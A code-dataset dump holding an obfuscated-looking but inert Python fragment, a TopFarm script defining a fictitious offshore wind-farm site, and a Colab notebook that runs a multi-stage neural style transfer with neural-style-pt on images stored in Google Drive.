QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ = gvEjBJHSxOCFwSJUJGBHfRFmxIPtUzquDkAyxwRRYovHJxtDDJAaqyRFzNODSMS
if vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx in jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC:
vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx = tFUPHnwlINDuyCIAzmPCJpAgRrbDCIiBBRIQFPSAFIBWOIQzuUzHSuvvCeGJqRA
elif vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx in QCWfQifxmjwHNkqhvnExHEuymnGYqHFSODFpZFQSkhpQDLDGxGEBEAyNwEivoSJ:
jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC = vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx
if jHsJgDHRLRSurHIuGRvDCEtIPjxOOIOYxRyqwOHrqQiSFBGDOFtjIIBCVyGCMRC in vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx:
vGtHHqwmpzSJANPxFEpEUILStsIWvxEvILswrUQCnEHAHHEhXEyyUtrRjxxXxsx = gvEjBJHSxOCFwSJUJGBHfRFmxIPtUzquDkAyxwRRYovHJxtDDJAaqyRFzNODSMS
rAFBSHNfNqQlRskEEOBCJCBrinBnGFJIUAEGRrJSOzbMDFRJPuteotGtOqQIFRF()
| 34,464 | 0 | 22 |
c608b7e78abd3f1e926ac291a49708e420d785ec | 2,057 | py | Python | topfarm/examples/data/parque_ficticio_offshore.py | DTUWindEnergy/TopFarm2 | cba70b20431f7a828370447117fe2e7533edf7c2 | [
"MIT"
] | 4 | 2019-02-18T08:46:00.000Z | 2021-01-28T06:35:52.000Z | topfarm/examples/data/parque_ficticio_offshore.py | DTUWindEnergy/TopFarm2 | cba70b20431f7a828370447117fe2e7533edf7c2 | [
"MIT"
] | 1 | 2019-11-26T12:12:12.000Z | 2019-11-26T12:12:12.000Z | topfarm/examples/data/parque_ficticio_offshore.py | DTUWindEnergy/TopFarm2 | cba70b20431f7a828370447117fe2e7533edf7c2 | [
"MIT"
] | 8 | 2019-01-14T09:33:26.000Z | 2021-06-30T11:56:03.000Z | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 28 10:55:12 2021
@author: mikf
"""
import numpy as np
from py_wake.examples.data.ParqueFicticio import ParqueFicticio_path
from py_wake.site import WaspGridSite
from py_wake.site.xrsite import XRSite
x = np.asarray([262403., 262553., 262703., 262853., 263003., 263153., 263303.,
263453., 263603., 263753., 263903., 264053., 264203., 264353.,
264503., 264653., 264803., 264953., 265103., 265253.])
y = np.asarray([6504239., 6504389., 6504539., 6504689., 6504839., 6504989.,
6505139., 6505289., 6505439., 6505589., 6505739., 6505889.,
6506039., 6506189., 6506339., 6506489., 6506639., 6506789.,
6506939., 6507089.])
wt_x = np.asarray([264904, 264372, 263839, 264904, 264372, 263839, 263306,
264638, 264105, 263572, 263039, 264372, 263839, 263039, 264358,
263839, 263039, 263839, 263306, 262773, 263306, 262773, 263039])
wt_y = np.asarray([6505613, 6505016, 6504420, 6506063, 6505467, 6504870,
6504273, 6506215, 6505619, 6505022, 6504425, 6506368, 6505771,
6504876, 6506803, 6506221, 6505326, 6506672, 6506075, 6505478,
6506525, 6505929, 6506677])
x_min_d = x.min()
x_max_d = x.max()
y_min_d = y.min()
y_max_d = y.max()
boundary = np.asarray([[x_min_d, y_max_d], [x_max_d, y_max_d],
[x_max_d, y_min_d], [x_min_d, y_min_d]])
if __name__ == '__main__':
site = ParqueFicticioOffshore()
| 39.557692 | 83 | 0.613515 | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 28 10:55:12 2021
@author: mikf
"""
import numpy as np
from py_wake.examples.data.ParqueFicticio import ParqueFicticio_path
from py_wake.site import WaspGridSite
from py_wake.site.xrsite import XRSite
x = np.asarray([262403., 262553., 262703., 262853., 263003., 263153., 263303.,
263453., 263603., 263753., 263903., 264053., 264203., 264353.,
264503., 264653., 264803., 264953., 265103., 265253.])
y = np.asarray([6504239., 6504389., 6504539., 6504689., 6504839., 6504989.,
6505139., 6505289., 6505439., 6505589., 6505739., 6505889.,
6506039., 6506189., 6506339., 6506489., 6506639., 6506789.,
6506939., 6507089.])
wt_x = np.asarray([264904, 264372, 263839, 264904, 264372, 263839, 263306,
264638, 264105, 263572, 263039, 264372, 263839, 263039, 264358,
263839, 263039, 263839, 263306, 262773, 263306, 262773, 263039])
wt_y = np.asarray([6505613, 6505016, 6504420, 6506063, 6505467, 6504870,
6504273, 6506215, 6505619, 6505022, 6504425, 6506368, 6505771,
6504876, 6506803, 6506221, 6505326, 6506672, 6506075, 6505478,
6506525, 6505929, 6506677])
x_min_d = x.min()
x_max_d = x.max()
y_min_d = y.min()
y_max_d = y.max()
boundary = np.asarray([[x_min_d, y_max_d], [x_max_d, y_max_d],
[x_max_d, y_min_d], [x_min_d, y_min_d]])
class ParqueFicticioOffshore(WaspGridSite, XRSite):
def __init__(self):
site = self.from_wasp_grd(ParqueFicticio_path, speedup_using_pickle=False)
site.ds['water_depth'] = - site.ds['Elevation'] / 10
ds = site.ds.drop_vars(['flow_inc', 'ws_mean', 'orog_spd', 'Turning',
'Elevation', 'Speedup'])
ds['x'] = x
ds['y'] = y
XRSite.__init__(self, ds)
self.boundary = boundary
self.initial_position = np.array([wt_x, wt_y]).T
if __name__ == '__main__':
site = ParqueFicticioOffshore()
| 441 | 30 | 49 |
f59e767ecc296ece5f2f229615f34bfb6522912e | 44,883 | py | Python | neural_style_pattern_transfer (1).py | Solidity-Coder/Paperspace | 65f128f85dea1d0f9efb8ab7ee8352f43e933ddc | [
"BSD-Source-Code"
] | null | null | null | neural_style_pattern_transfer (1).py | Solidity-Coder/Paperspace | 65f128f85dea1d0f9efb8ab7ee8352f43e933ddc | [
"BSD-Source-Code"
] | null | null | null | neural_style_pattern_transfer (1).py | Solidity-Coder/Paperspace | 65f128f85dea1d0f9efb8ab7ee8352f43e933ddc | [
"BSD-Source-Code"
] | null | null | null | # -*- coding: utf-8 -*-
"""Neural Style Pattern Transfer.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1ijYjSvGfWm1aUkw0stn6P7U8pYwhsbU0
"""
#!nvcc --version
print("Your GPU is a ")
!nvidia-smi -L
print("GPU Logs")
print("Nvidia K80 is not enough to do past A5 for high res inputs and A7 for low res inputs")
print("Nvidia P100 will do an A8 in around 23 minutes")
from psutil import virtual_memory
ram_gb = virtual_memory().total / 1e9
print('Your runtime has {:.1f} gigabytes of available RAM\n'.format(ram_gb))
if ram_gb < 20:
print('Not using a high-RAM runtime')
else:
print('You are using a high-RAM runtime!')
from google.colab import drive
drive.mount('/content/gdrive')
!git clone https://github.com/ProGamerGov/neural-style-pt.git
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/channel_pruning.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/nin_imagenet.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/vgg16-00b39a1b.pth" /content/neural-style-pt/models/
!cp -ri "/content/gdrive/My Drive/NSPT/checkpoints/vgg19-d01eb7cb.pth" /content/neural-style-pt/models/
!pip install torch==1.7.1+cu101 torchvision==0.8.2+cu101 torchaudio===0.7.2 -f https://download.pytorch.org/whl/torch_stable.html
#---------#
# STYLE 1 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/1A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/1A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/1A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_1.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style1' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input1.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_1.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-1.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 2 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/2A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/2A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/2A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_2.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style2' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input2.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_2.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-2.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 3 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/3A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/3A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 15 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/3A6.png' -learning_rate 1 -print_iter 50 -save_iter 100 -image_size 3600 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/channel_pruning.pth' -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/Final_3.png' -tv_weight 0 -original_colors 0 -backend cudnn
#Optional - 80MB+ 7200x7200 image (but causes grain in flat colour areas)
#!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style3' -style_weight 1500 -style_scale 0.5 -content_image '/content/gdrive/MyDrive/NSPT/input/input3.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/Final_3.png' -learning_rate 1 -print_iter 50 -save_iter 0 -image_size 7200 -num_iterations 10 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nin_imagenet.pth' -content_layers relu0,relu1 -style_layers relu0,relu1 -optimizer adam -output_image '/content/gdrive/MyDrive/NSPT/output/A8-FINAL-3.png' -tv_weight 0 -original_colors 0 -backend cudnn
#---------#
# STYLE 4 #
#---------#
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -init random -learning_rate 1 -print_iter 50 -save_iter 250 -image_size 512 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A1.png' -tv_weight 0.00001 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A1.png' -print_iter 50 -save_iter 250 -image_size 768 -num_iterations 600 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_imag '/content/gdrive/MyDrive/NSPT/output/4A2.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 1000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A2.png' -print_iter 50 -save_iter 250 -image_size 1024 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A3.png' -tv_weight 0.00001 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A3.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -style_layers relu1_1,relu2_1,relu3_1,relu4_1,relu5_1 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A4.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 80000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 5 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A4.png' -print_iter 50 -save_iter 250 -image_size 1400 -num_iterations 1000 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -style_layers relu1_1,relu1_2,relu2_1,relu2_2,relu3_1,relu3_2,relu3_3,relu3_4,relu4_1,relu4_2,relu4_3,relu4_4,relu5_1,relu5_2,relu5_3,relu5_4 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A5.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
!python neural-style-pt/neural_style.py -style_image '/content/gdrive/MyDrive/NSPT/style/style4' -style_weight 40000 -style_scale 1 -content_image '/content/gdrive/MyDrive/NSPT/input/input4.png' -content_weight 0 -init image -init_image '/content/gdrive/MyDrive/NSPT/output/4A5.png' -print_iter 50 -save_iter 100 -image_size 1800 -num_iterations 200 -model_file '/content/gdrive/MyDrive/NSPT/checkpoints/nyud-fcn32s-color-heavy.pth' -content_layers relu1_1,relu1_2 -style_layers relu1_1,relu1_2 -optimizer lbfgs -output_image '/content/gdrive/MyDrive/NSPT/output/4A6.png' -tv_weight 0 -gpu 0 -original_colors 0 -backend cudnn
